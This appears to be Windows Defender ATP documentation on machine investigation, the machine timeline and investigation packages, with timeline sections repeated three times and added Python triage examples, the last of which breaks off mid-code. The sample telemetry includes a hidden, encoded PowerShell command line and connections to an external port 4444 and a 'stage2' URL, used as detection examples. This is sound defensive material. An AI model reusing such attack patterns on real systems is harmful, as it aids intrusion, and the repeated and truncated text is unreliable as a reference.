Event type - Click the drop-down button to filter by events such as Windows - Windows Defender ATP
alerts, Windows Defender Application Guard events, registry events, file events, and others.
Filtering by event type allows you to define precise queries so that you see events with a specific focus. For
example, you can search for a file name, then filter the results to only see Process events matching the search
criteria or to only view file events, or even better: to view only network events over a period of time to make
sure no suspicious outbound communications go unnoticed.

NOTE
For firewall events to be displayed, you'll need to enable the audit policy, see Audit Filtering Platform connection. Firewall
covers the following events:
5025 - firewall service stopped
5031 - application blocked from accepting incoming connections on the network
5157 - blocked connection

User account – Click the drop-down button to filter the machine timeline by the following user associated
events:
Logon users
System
Network
Local service
The following example illustrates the use of type:value pair. The events were filtered by searching for the user
jonathan.wolcott and network events as the event type:

The results in the timeline only show network communication events run in the defined user context.
Filter events from a specific date
Use the time-based slider to filter events from a specific date. By default, the machine timeline is set to display the
events of the current day.
Using the slider updates the listed alerts to the date that you select. Displayed events are filtered from that date and
older.
The slider is helpful when you're investigating a particular alert on a machine. You can navigate from the Alerts
view and click on the machine associated with the alert to jump to the specific date when the alert was observed,
enabling you to investigate the events that took place around the alert.
Export machine timeline events
You can also export detailed event data from the machine timeline to conduct offline analysis. You can choose to
export the machine timeline for the current date or specify a date range. You can export up to seven days of data
and specify the specific time between the two dates.

Navigate between pages


Use the events per page drop-down to choose the number of alerts you’d like to see on the page. You can choose to
display 20, 50, or 100 events per page. You can also move between pages by clicking Older or Newer.
From the Machines list, you can also navigate to the file, IP, or URL view and the timeline associated with an alert
is retained, helping you view the investigation from different angles and retain the context of the event time line.
From the list of events that are displayed in the timeline, you can examine the behaviors or events in to help identify
indicators of interests such as files and IP addresses to help determine the scope of a breach. You can then use the
information to respond to events and keep your system secure.

You can also use the Artifact timeline feature to see the correlation between alerts and events on a specific machine.
Expand an event to view associated processes related to the event. Click on the circle next to any process or IP
address in the process tree to investigate additional details of the identified processes. This action brings up the
Details pane which includes execution context of processes, network communications and a summary of meta
data on the file or IP address.
The details pane enriches the ‘in-context’ information across investigation and exploration activities, reducing the
need to switch between contexts. It lets you focus on the task of tracing associations between attributes without
leaving the current context.

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Investigate machines in the Windows Defender ATP
Machines list
4/5/2019 • 7 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Investigate machines
Investigate the details of an alert raised on a specific machine to identify other behaviors or events that might be
related to the alert or the potential scope of breach.
You can click on affected machines whenever you see them in the portal to open a detailed report about that
machine. Affected machines are identified in the following areas:
The Machines list
The Alerts queue
The Security operations dashboard
Any individual alert
Any individual file details view
Any IP address or domain details view
When you investigate a specific machine, you'll see:
Machine details, Logged on users, Machine risk, and Machine Reporting
Alerts related to this machine
Machine timeline

The machine details, logged on users, machine risk, and machine reporting sections display various attributes
about the machine.
Machine details
The machine details tile provides information such as the domain and OS of the machine. If there's an investigation
package available on the machine, you'll see a link that allows you to download the package.
For more information on how to take action on a machine, see Take response action on a machine.
Logged on users
Clicking on the logged on users in the Logged on users tile opens the Users Details pane that displays the following
information for logged on users in the past 30 days:
Interactive and remote interactive logins
Network, batch, and system logins

You'll also see details such as logon types for each user account, the user group, and when the account logon
occurred.
For more information, see Investigate user entities.
Machine risk
The Machine risk tile shows the overall risk assessment of a machine. A machine's risk level can be determined
using the number of active alerts or by a combination of multiple risks that may increase the risk assessment and
their severity levels. You can influence a machine's risk level by resolving associated alerts manually or
automatically and also by suppressing an alert. It's also indicators of the active threats that machines could be
exposed to.
Azure Advanced Threat Protection
If you have enabled the Azure ATP feature and there are alerts related to the machine, you can click on the link that
will take you to the Azure ATP page where more information about the alerts are provided.

NOTE
You'll need to enable the integration on both Azure ATP and Windows Defender ATP to use this feature. In Windows Defender
ATP, you can enable this feature in advanced features. For more information on how to enable advanced features, see Turn on
advanced features.

Machine reporting
Provides the last internal IP and external IP of the machine. It also shows when the machine was first and last seen
reporting to the service.

Alerts related to this machine


The Alerts related to this machine section provides a list of alerts that are associated with the machine. You can
also manage alerts from this section by clicking the circle icons to the left of the alert (or using Ctrl or Shift + click
to select multiple alerts).
This list is a filtered version of the Alerts queue, and shows the date when the alert's last activity was detected, a
short description of the alert, the user account associated with the alert, the alert's severity, the alert's status in the
queue, and who is addressing the alert.
You can also choose to highlight an alert from the Alerts related to this machine or from the Machine timeline
section to see the correlation between the alert and its related events on the machine by right-clicking on the alert
and selecting Select and mark events. This highlights the alert and its related events and helps distinguish them
from other alerts and events appearing in the timeline. Highlighted events are displayed in all information levels
whether you choose to view the timeline by Detections, Behaviors, or Verbose.

Machine timeline
The Machine timeline section provides a chronological view of the events and associated alerts that have been
observed on the machine.
This feature also enables you to selectively drill down into events that occurred within a given time period. You can
view the temporal sequence of events that occurred on a machine over a selected time period.

Windows Defender ATP monitors and captures suspicious or anomalous behavior on Windows 10 machines and
displays the process tree flow in the Machine timeline. This gives you better context of the behavior which can
contribute to understanding the correlation between events, files, and IP addresses in relation to the machine.
Search for specific events
Use the search bar to look for specific timeline events. Harness the power of using the following defined search
queries based on type:value pairs and event filter types to sift through the search results:
Value - Type in any search keyword to filter the timeline with the attribute you’re searching for. This search
supports defined search queries based on type:value pairs.
You can use any of the following values:
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
Informational level – Click the drop-down button to filter by the following levels:
Detections mode: displays Windows ATP Alerts and detections
Behaviors mode: displays "detections" and selected events of interest
Verbose mode: displays all raw events without aggregation or filtering
Event type - Click the drop-down button to filter by events such as Windows - Windows Defender ATP
alerts, Windows Defender Application Guard events, registry events, file events, and others.
Filtering by event type allows you to define precise queries so that you see events with a specific focus. For
example, you can search for a file name, then filter the results to only see Process events matching the search
criteria or to only view file events, or even better: to view only network events over a period of time to make
sure no suspicious outbound communications go unnoticed.

NOTE
For firewall events to be displayed, you'll need to enable the audit policy, see Audit Filtering Platform connection. Firewall
covers the following events:
5025 - firewall service stopped
5031 - application blocked from accepting incoming connections on the network
5157 - blocked connection

User account – Click the drop-down button to filter the machine timeline by the following user associated
events:
Logon users
System
Network
Local service
The following example illustrates the use of type:value pair. The events were filtered by searching for the user
jonathan.wolcott and network events as the event type:

The results in the timeline only show network communication events run in the defined user context.
Filter events from a specific date
Use the time-based slider to filter events from a specific date. By default, the machine timeline is set to display the
events of the current day.
Using the slider updates the listed alerts to the date that you select. Displayed events are filtered from that date and
older.
The slider is helpful when you're investigating a particular alert on a machine. You can navigate from the Alerts
view and click on the machine associated with the alert to jump to the specific date when the alert was observed,
enabling you to investigate the events that took place around the alert.
Export machine timeline events
You can also export detailed event data from the machine timeline to conduct offline analysis. You can choose to
export the machine timeline for the current date or specify a date range. You can export up to seven days of data
and specify the specific time between the two dates.

Navigate between pages


Use the events per page drop-down to choose the number of alerts you’d like to see on the page. You can choose to
display 20, 50, or 100 events per page. You can also move between pages by clicking Older or Newer.
From the Machines list, you can also navigate to the file, IP, or URL view and the timeline associated with an alert
is retained, helping you view the investigation from different angles and retain the context of the event time line.
From the list of events that are displayed in the timeline, you can examine the behaviors or events in to help identify
indicators of interests such as files and IP addresses to help determine the scope of a breach. You can then use the
information to respond to events and keep your system secure.

You can also use the Artifact timeline feature to see the correlation between alerts and events on a specific machine.
Expand an event to view associated processes related to the event. Click on the circle next to any process or IP
address in the process tree to investigate additional details of the identified processes. This action brings up the
Details pane which includes execution context of processes, network communications and a summary of meta
data on the file or IP address.
The details pane enriches the ‘in-context’ information across investigation and exploration activities, reducing the
need to switch between contexts. It lets you focus on the task of tracing associations between attributes without
leaving the current context.

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Investigate machines in the Windows Defender ATP
Machines list
4/5/2019 • 7 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Investigate machines
Investigate the details of an alert raised on a specific machine to identify other behaviors or events that might be
related to the alert or the potential scope of breach.
You can click on affected machines whenever you see them in the portal to open a detailed report about that
machine. Affected machines are identified in the following areas:
The Machines list
The Alerts queue
The Security operations dashboard
Any individual alert
Any individual file details view
Any IP address or domain details view
When you investigate a specific machine, you'll see:
Machine details, Logged on users, Machine risk, and Machine reporting
Alerts related to this machine
Machine timeline

The machine details, logged on users, machine risk, and machine reporting sections display various attributes
about the machine.
Machine details
The machine details tile provides information such as the domain and OS of the machine. If there's an investigation
package available on the machine, you'll see a link that allows you to download the package.
For more information on how to take action on a machine, see Take response action on a machine.
Logged on users
Clicking the Logged on users tile opens the Users Details pane, which displays the following information for users
who logged on in the past 30 days:
Interactive and remote interactive logins
Network, batch, and system logins

You'll also see details such as logon types for each user account, the user group, and when the account logon
occurred.
For more information, see Investigate user entities.
Machine risk
The Machine risk tile shows the overall risk assessment of a machine. A machine's risk level is determined by the
number of active alerts, or by a combination of multiple risks whose severity levels together raise the assessment.
You can influence a machine's risk level by resolving associated alerts, manually or automatically, and by
suppressing alerts; note that suppressing an alert lowers the score without changing the underlying exposure. The
risk level also indicates the active threats the machine could be exposed to.
Azure Advanced Threat Protection
If you have enabled the Azure ATP integration and there are alerts related to the machine, you can click the link to
go to the Azure ATP page, where more information about the alerts is provided.

NOTE
You'll need to enable the integration on both Azure ATP and Windows Defender ATP to use this feature. In Windows Defender
ATP, you can enable this feature in advanced features. For more information on how to enable advanced features, see Turn on
advanced features.

Machine reporting
Provides the last internal IP and external IP of the machine. It also shows when the machine was first and last seen
reporting to the service.

Alerts related to this machine


The Alerts related to this machine section provides a list of alerts that are associated with the machine. You can
also manage alerts from this section by clicking the circle icons to the left of the alert (or using Ctrl or Shift + click
to select multiple alerts).
This list is a filtered version of the Alerts queue, and shows the date when the alert's last activity was detected, a
short description of the alert, the user account associated with the alert, the alert's severity, the alert's status in the
queue, and who is addressing the alert.
You can also choose to highlight an alert from the Alerts related to this machine or from the Machine timeline
section to see the correlation between the alert and its related events on the machine by right-clicking on the alert
and selecting Select and mark events. This highlights the alert and its related events and helps distinguish them
from other alerts and events appearing in the timeline. Highlighted events are displayed in all information levels
whether you choose to view the timeline by Detections, Behaviors, or Verbose.

Machine timeline
The Machine timeline section provides a chronological view of the events and associated alerts that have been
observed on the machine.
This feature also enables you to selectively drill down into events that occurred within a given time period. You can
view the temporal sequence of events that occurred on a machine over a selected time period.

Windows Defender ATP monitors and captures suspicious or anomalous behavior on Windows 10 machines and
displays the process tree in the Machine timeline. This gives you context for the behavior and helps you understand
how events, files, and IP addresses on the machine are related.
Search for specific events
Use the search bar to look for specific timeline events. Combine type:value search queries with the event filter
types described below to narrow the results:
Value - Type any search keyword to filter the timeline by the attribute you're searching for. The search supports
queries based on type:value pairs.
You can use any of the following values:
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
Informational level – Click the drop-down button to filter by the following levels:
Detections mode: displays Windows Defender ATP alerts and detections
Behaviors mode: displays "detections" and selected events of interest
Verbose mode: displays all raw events without aggregation or filtering
Event type - Click the drop-down button to filter by event type, such as Windows Defender ATP alerts, Windows
Defender Application Guard events, registry events, file events, and others.
Filtering by event type allows you to define precise queries so that you see events with a specific focus. For
example, you can search for a file name, then filter the results to only see Process events matching the search
criteria or to only view file events, or even better: to view only network events over a period of time to make
sure no suspicious outbound communications go unnoticed.

NOTE
For firewall events to be displayed, you'll need to enable the audit policy; see Audit Filtering Platform Connection. The
Firewall event type covers the following Security log events:
5025 - the Windows Firewall service was stopped
5031 - the Windows Firewall service blocked an application from accepting incoming connections on the network
5157 - the Windows Filtering Platform blocked a connection

User account – Click the drop-down button to filter the machine timeline by the following user associated
events:
Logon users
System
Network
Local service
The following example illustrates the use of a type:value pair. The events were filtered by searching for the user
jonathan.wolcott and selecting network events as the event type:

The results in the timeline only show network communication events run in the defined user context.
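The note above names the Security log events behind the Firewall event type. They only exist if the Filtering Platform Connection subcategory is audited on the endpoint, which is normally pushed by Group Policy or, on a single machine, enabled with auditpol /set /subcategory:"Filtering Platform Connection" /success:enable /failure:enable. The following Python is an added example, not code from Windows Defender ATP, showing how an analyst can triage those events offline once they are exported from the Security log: it groups blocked outbound connections (5157) and blocked listeners (5031) per application, separates external destinations from internal ones, and treats a stopped firewall service (5025) as a finding on its own. The field names follow the event templates; the hosts, processes and addresses are constructed.

```python
"""Triage of Windows firewall / Filtering Platform audit events (5025, 5031, 5157).

Added example for this page; it is not code from Windows Defender ATP. The
records below are constructed: the field names follow the Windows Security
log templates for these event IDs, but every host, process and address is
invented. Load real events (for example a JSON export of the Security log)
into the same dict shape before running triage() on them.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Address ranges treated as internal; anything else is an external destination.
INTERNAL_NETWORKS = [ip_network(n) for n in
                     ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed image paths, in the \device\... form the events use.
MALWARE = "\\device\\harddiskvolume2\\users\\jonathan.wolcott\\appdata\\local\\temp\\update.exe"
SVCHOST = "\\device\\harddiskvolume2\\windows\\system32\\svchost.exe"

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 5157, "TimeCreated": "2019-04-05T10:02:11Z", "Application": MALWARE,
     "Direction": "Outbound", "SourceAddress": "10.0.0.25",
     "DestAddress": "203.0.113.7", "DestPort": 4444, "Protocol": 6},
    {"EventID": 5157, "TimeCreated": "2019-04-05T10:02:15Z", "Application": MALWARE,
     "Direction": "Outbound", "SourceAddress": "10.0.0.25",
     "DestAddress": "203.0.113.7", "DestPort": 4444, "Protocol": 6},
    {"EventID": 5157, "TimeCreated": "2019-04-05T10:03:40Z", "Application": SVCHOST,
     "Direction": "Outbound", "SourceAddress": "10.0.0.25",
     "DestAddress": "10.0.0.1", "DestPort": 53, "Protocol": 17},
    {"EventID": 5031, "TimeCreated": "2019-04-05T10:05:02Z", "Application": MALWARE},
    {"EventID": 5025, "TimeCreated": "2019-04-05T10:06:30Z"},
    {"EventID": 4624, "TimeCreated": "2019-04-05T10:07:00Z"},   # unrelated event, ignored
]


def is_internal(address):
    """True for RFC 1918, loopback, link-local and unspecified addresses."""
    addr = ip_address(address)
    if addr.is_loopback or addr.is_link_local or addr.is_unspecified:
        return True
    return any(addr in net for net in INTERNAL_NETWORKS)


def _image_name(event):
    """Last path component of the \\device\\... image path carried by the event."""
    return event["Application"].rsplit("\\", 1)[-1]


def triage(events):
    """Group firewall audit events by application.

    Returns {"service_stopped": [timestamps], "applications": {name: stats}},
    where stats counts blocked outbound connections (5157), blocked inbound
    listeners (5031) and the set of external destinations that were attempted.
    """
    apps = defaultdict(lambda: {"blocked_outbound": 0, "listener_blocked": 0,
                                "external_destinations": set()})
    service_stopped = []
    for event in events:
        event_id = event.get("EventID")
        if event_id == 5025:            # firewall service stopped: a finding by itself
            service_stopped.append(event["TimeCreated"])
        elif event_id == 5031:          # application blocked from accepting inbound connections
            apps[_image_name(event)]["listener_blocked"] += 1
        elif event_id == 5157 and event.get("Direction") == "Outbound":
            stats = apps[_image_name(event)]
            stats["blocked_outbound"] += 1
            if not is_internal(event["DestAddress"]):
                stats["external_destinations"].add(
                    f"{event['DestAddress']}:{event['DestPort']}")
    return {"service_stopped": service_stopped, "applications": dict(apps)}


def suspicious_applications(events, min_blocked=2):
    """Applications repeatedly blocked from reaching external addresses."""
    apps = triage(events)["applications"]
    return sorted(name for name, stats in apps.items()
                  if stats["blocked_outbound"] >= min_blocked
                  and stats["external_destinations"])


if __name__ == "__main__":
    report = triage(SAMPLE_EVENTS)
    for name, stats in report["applications"].items():
        print(name, stats)
    print("firewall stopped at:", report["service_stopped"])
    print("suspicious:", suspicious_applications(SAMPLE_EVENTS))
```

Blocked connections from a process running under a user's Temp directory to a single external port, followed by the firewall service stopping, is the pattern the summary is built to surface; adjust INTERNAL_NETWORKS to the organisation's address plan before relying on the external/internal split.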
Filter events from a specific date
Use the time-based slider to filter events from a specific date. By default, the machine timeline is set to display the
events of the current day.
Moving the slider updates the listed events to the date that you select; the timeline then shows events from that
date backward.
The slider is helpful when you're investigating a particular alert on a machine. You can navigate from the Alerts
view and click on the machine associated with the alert to jump to the specific date when the alert was observed,
enabling you to investigate the events that took place around the alert.
Export machine timeline events
You can also export detailed event data from the machine timeline to conduct offline analysis. You can choose to
export the machine timeline for the current date or specify a date range. You can export up to seven days of data
and specify the specific time between the two dates.
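The type:value search and the timeline export described above work together: once a range of events is exported, the same filters can be reproduced offline. The following Python is an added example, not code from Windows Defender ATP; the export schema (column names) is an assumption because the page does not describe it, and the rows are constructed. It parses a query such as user:jonathan.wolcott into typed terms and free keywords, then applies them together with an event-type filter and a time window, as the portal does.

```python
"""Offline filtering of an exported machine timeline with type:value queries.

Added example for this page; it is not code from Windows Defender ATP. The
export schema is an assumption: the page does not describe the export's
columns, so the header below (time, event_type, user, file_name, path,
command_line, sha1, md5, remote_ip, url) is invented and every row is
constructed. Map a real export's columns onto these names before use.
"""
import csv
import io
from datetime import datetime

SAMPLE_EXPORT = """\
time,event_type,user,file_name,path,command_line,sha1,md5,remote_ip,url
2019-04-05T09:58:01Z,ProcessCreated,jonathan.wolcott,powershell.exe,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,powershell -nop -w hidden -enc SQBFAFgA,da39a3ee5e6b4b0d3255bfef95601890afd80709,,,
2019-04-05T09:58:03Z,NetworkConnection,jonathan.wolcott,powershell.exe,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,,,,203.0.113.7,https://203.0.113.7/stage2
2019-04-05T09:58:05Z,FileCreated,jonathan.wolcott,update.exe,C:\\Users\\jonathan.wolcott\\AppData\\Local\\Temp\\update.exe,,,d41d8cd98f00b204e9800998ecf8427e,,
2019-04-05T10:00:12Z,NetworkConnection,SYSTEM,svchost.exe,C:\\Windows\\System32\\svchost.exe,,,,10.0.0.1,
2019-04-06T02:14:09Z,NetworkConnection,jonathan.wolcott,update.exe,C:\\Users\\jonathan.wolcott\\AppData\\Local\\Temp\\update.exe,,,,203.0.113.7,
"""

# Which exported columns each search type inspects. "hash" checks both the
# SHA-1 and MD5 columns, mirroring the portal's "Hash: Sha1 or MD5" search.
SEARCH_TYPES = {
    "hash": ("sha1", "md5"), "filename": ("file_name",), "extension": ("file_name",),
    "path": ("path",), "commandline": ("command_line",), "user": ("user",),
    "ip": ("remote_ip",), "url": ("url",),
}
EXACT_TYPES = {"hash", "ip", "user"}   # must match whole values; the rest match substrings


def load_export(text):
    """Parse the exported CSV into a list of row dicts."""
    return list(csv.DictReader(io.StringIO(text)))


def parse_query(query):
    """Split a search string into type:value pairs and free keywords."""
    typed, keywords = {}, []
    for token in query.split():
        key, sep, value = token.partition(":")
        if sep and value and key.lower() in SEARCH_TYPES:
            typed.setdefault(key.lower(), []).append(value)
        else:
            keywords.append(token)
    return {"typed": typed, "keywords": keywords}


def _matches_typed(row, key, value):
    value = value.lower()
    fields = [(row.get(col) or "").lower() for col in SEARCH_TYPES[key]]
    if key == "extension":
        return any(f.endswith("." + value.lstrip(".")) for f in fields)
    if key in EXACT_TYPES:
        return value in fields
    return any(value in f for f in fields)


def _time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def filter_events(rows, query="", event_type=None, start=None, end=None):
    """Apply a type:value query, an event-type filter and an inclusive time window.

    start/end are ISO timestamps in the export's own form ("2019-04-05T00:00:00Z").
    """
    parsed = parse_query(query)
    matched = []
    for row in rows:
        if event_type and row.get("event_type") != event_type:
            continue
        ts = _time(row["time"])
        if (start and ts < _time(start)) or (end and ts > _time(end)):
            continue
        if not all(_matches_typed(row, key, v)
                   for key, values in parsed["typed"].items() for v in values):
            continue
        # Free keywords match anywhere in the row, like the portal's plain search.
        haystack = " ".join((row.get(col) or "") for col in row).lower()
        if not all(word.lower() in haystack for word in parsed["keywords"]):
            continue
        matched.append(row)
    return matched


if __name__ == "__main__":
    rows = load_export(SAMPLE_EXPORT)
    # Same filter as the portal example: user jonathan.wolcott, network events only.
    for row in filter_events(rows, "user:jonathan.wolcott", event_type="NetworkConnection"):
        print(row["time"], row["file_name"], "->", row["remote_ip"])
```

Exact matching for hash, ip and user avoids a search for user "jon" silently matching every "jonathan.*" account; names, paths, command lines and URLs deliberately match as substrings so that a search for "temp" finds files dropped under any user's Temp directory.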

Navigate between pages


Use the events per page drop-down to choose the number of events you'd like to see on the page. You can choose to
display 20, 50, or 100 events per page. You can also move between pages by clicking Older or Newer.
From the Machines list, you can also navigate to the file, IP, or URL view; the timeline associated with an alert is
retained, helping you view the investigation from different angles while keeping the context of the event timeline.
From the list of events displayed in the timeline, you can examine the behaviors or events to help identify
indicators of interest, such as files and IP addresses, that help determine the scope of a breach. You can then use the
information to respond to events and keep your system secure.

You can also use the Artifact timeline feature to see the correlation between alerts and events on a specific machine.
Expand an event to view the processes associated with it. Click the circle next to any process or IP address in the
process tree to investigate it further. This opens the Details pane, which includes the execution context of the
process, its network communications, and a summary of the metadata on the file or IP address.
The Details pane enriches the in-context information available during investigation and exploration, reducing the
need to switch between views: you can trace associations between attributes without leaving the current context.

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Take response actions in Windows Defender ATP
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


You can take response actions on machines and files to respond quickly to detected attacks, contain them, and
prevent further damage by malicious actors in your organization.

NOTE
The machine-related response actions are only available for machines running Windows 10 (version 1703 or later),
Windows Server, version 1803, and Windows Server 2019.

In this section
Take response actions on a machine - Isolate machines or collect an investigation package.
Take response actions on a file - Stop and quarantine files or block a file from your network.
Take response actions on a machine
4/22/2019 • 11 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Quickly respond to detected attacks by isolating machines or collecting an investigation package. After taking
action on machines, you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.
For non-Windows platforms, response capabilities (such as machine isolation) depend on the capabilities of the
third-party product.

Collect investigation package from machines


As part of the investigation or response process, you can collect an investigation package from a machine. By
collecting the investigation package, you can identify the current state of the machine and further understand the
tools and techniques used by the attacker.

IMPORTANT
This response action is available for machines on Windows 10, version 1703 or later.

You can download the package (Zip file) and investigate the events that occurred on a machine.
The package contains the following folders:

Autoruns - Contains a set of files that each represent the content of the registry of a known auto start entry point
(ASEP) to help identify the attacker's persistence on the machine.
NOTE: If the registry key is not found, the file contains the message "ERROR: The system was unable to find the
specified registry key or value."

Installed programs - This .CSV file contains the list of installed programs, which can help identify what is currently
installed on the machine. For more information, see Win32_Product class.

Network connections - This folder contains a set of data points related to connectivity information, which can help
identify connections to suspicious URLs, the attacker's command and control (C&C) infrastructure, lateral movement,
or remote connections.
- ActiveNetworkConnections.txt - Displays protocol statistics and current TCP/IP network connections. Lets you look
for suspicious connectivity made by a process.
- Arp.txt - Displays the current address resolution protocol (ARP) cache tables for all interfaces. The ARP cache can
reveal additional hosts on the network that have been compromised, or suspicious systems that might have been
used to run an internal attack.
- Dnscache.txt - Displays the contents of the DNS client resolver cache, which includes both entries preloaded from
the local Hosts file and any recently obtained resource records for name queries resolved by the computer. This
can help identify suspicious connections.
- Ipconfig.txt - Displays the full TCP/IP configuration for all adapters. Adapters can represent physical interfaces,
such as installed network adapters, or logical interfaces, such as dial-up connections.

Prefetch files - Windows Prefetch files are designed to speed up application startup. They can be used to track files
recently used on the system and to find traces of applications that might have been deleted but still appear in the
prefetch file list.
- Prefetch folder - Contains a copy of the prefetch files from %SystemRoot%\Prefetch. NOTE: Download a prefetch
file viewer to view the prefetch files.
- PrefetchFilesList.txt - Contains the list of all copied files, which can be used to check whether any copies to the
prefetch folder failed.

Processes - Contains a .CSV file listing the running processes, which lets you identify the processes currently running
on the machine. This is useful when identifying a suspicious process and its state.

Scheduled tasks - Contains a .CSV file listing the scheduled tasks, which can be used to identify routines performed
automatically on the machine and to look for suspicious code set to run automatically.

Security event log - Contains the security event log, which holds records of logon and logoff activity and other
security-related events specified by the system's audit policy.
NOTE: Open the event log file using Event Viewer.

Services - Contains the services.txt file, which lists services and their states.

Windows Server Message Block (SMB) sessions - Lists shared access to files, printers, and serial ports, and
miscellaneous communications between nodes on a network. This can help identify data exfiltration or lateral
movement. Contains files for SMBInboundSessions and SMBOutboundSession.
NOTE: If the file contains the message "ERROR: The system was unable to find the specified registry key or value.",
there were no SMB sessions of that type (inbound or outbound).

Temp Directories - Contains a set of text files that list the files located in %Temp% for every user on the system.
This can help track suspicious files that an attacker may have dropped on the system.
NOTE: If the file contains the message "The system cannot find the path specified", there is no temp directory for
that user, possibly because the user never logged on to the system.

Users and Groups - Provides a list of files that each represent a group and its members.

CollectionSummaryReport.xls - A summary of the investigation package collection. It contains the list of data points,
the command used to extract each one, the execution status, and the error code in case of failure. Use this report to
check that the package includes all the expected data and to identify any errors.

1. Select the machine that you want to investigate. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the heading of the machine name from the machines list.
Search box - Select Machine from the drop-down menu and enter the machine name.
2. Open the Actions menu and select Collect investigation package.
3. Type a comment and select Yes, collect package to take action on the machine.

The Action center shows the submission information:
Submission time - Shows when the action was submitted.
Status - Indicates whether the package was successfully collected from the network. When the collection is
complete, you can download the package.
4. Select Package available to download the package.
When the package is available a new event will be added to the machine timeline.
You can download the package from the machine page, or the Action center.
You can also search for historical packages in the machine timeline.
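Once the package is downloaded, the Network connections and Processes folders are the quickest way to confirm or rule out live attacker connectivity. The following Python is an added example, not code from Windows Defender ATP, that joins ActiveNetworkConnections.txt (assumed to be netstat-style output) to the Processes .CSV (assumed to carry pid, name and path columns) and lists established connections to external addresses together with the owning process; it also recognises the collector's "registry key not found" and "path not found" messages described above, so that an empty data point is not mistaken for a failed one. The sample file contents are constructed.

```python
"""Triage helpers for a downloaded investigation package.

Added example for this page; it is not code from Windows Defender ATP.
ActiveNetworkConnections.txt is parsed as netstat-style output ("Proto,
Local Address, Foreign Address, State, PID" columns) and the Processes
.CSV is assumed to carry pid, name and path columns; both layouts and all
sample contents below are constructed for the example, not taken from a
real package.
"""
import csv
import io
from ipaddress import ip_address, ip_network

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.25:49712        203.0.113.7:4444       ESTABLISHED     4812
  TCP    10.0.0.25:49730        10.0.0.5:445           ESTABLISHED     4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    [::]:135               [::]:0                 LISTENING       912
  UDP    0.0.0.0:5353           *:*                                    1540
"""

PROCESSES_SAMPLE = """\
pid,name,path
4,System,
912,svchost.exe,C:\\Windows\\System32\\svchost.exe
1540,svchost.exe,C:\\Windows\\System32\\svchost.exe
4812,update.exe,C:\\Users\\jonathan.wolcott\\AppData\\Local\\Temp\\update.exe
"""

# Messages the collector writes when a data point is empty rather than failed
# (quoted from the folder descriptions on this page).
NO_KEY_MESSAGE = "ERROR: The system was unable to find the specified registry key or value."
NO_PATH_MESSAGE = "The system cannot find the path specified"

INTERNAL_NETWORKS = [ip_network(n) for n in
                     ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def collected_file_status(text):
    """Classify a collected text file as 'no entries', 'missing directory' or 'data'."""
    if NO_KEY_MESSAGE in text:
        return "no entries"
    if NO_PATH_MESSAGE in text:
        return "missing directory"
    return "data"


def split_endpoint(endpoint):
    """'203.0.113.7:4444' -> ('203.0.113.7', 4444); '[::]:135' -> ('::', 135); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def is_internal(host):
    """True for private, loopback, link-local, unspecified or non-IP endpoints."""
    try:
        addr = ip_address(host)
    except ValueError:          # '*' or a hostname: not an external IP we can judge
        return True
    return (addr.is_loopback or addr.is_link_local or addr.is_unspecified
            or any(addr in net for net in INTERNAL_NETWORKS))


def parse_netstat(text):
    """Turn netstat-style rows into dicts; UDP rows carry no State column."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP":
            proto, local, foreign, state, pid = parts[:5]
        else:
            proto, local, foreign, pid = parts[:4]
            state = ""
        conns.append({"proto": proto, "local": local, "foreign": foreign,
                      "state": state, "pid": int(pid)})
    return conns


def load_processes(text):
    """Index the Processes .CSV by PID."""
    return {int(row["pid"]): row for row in csv.DictReader(io.StringIO(text))}


def external_connections(netstat_text, processes_text):
    """Established connections to non-internal addresses, joined to the owning process."""
    procs = load_processes(processes_text)
    findings = []
    for conn in parse_netstat(netstat_text):
        host, port = split_endpoint(conn["foreign"])
        if conn["state"] != "ESTABLISHED" or is_internal(host):
            continue
        proc = procs.get(conn["pid"], {})
        path = proc.get("path", "")
        findings.append({"pid": conn["pid"], "proto": conn["proto"],
                         "process": proc.get("name", "<not in Processes list>"),
                         "path": path, "remote": f"{host}:{port}",
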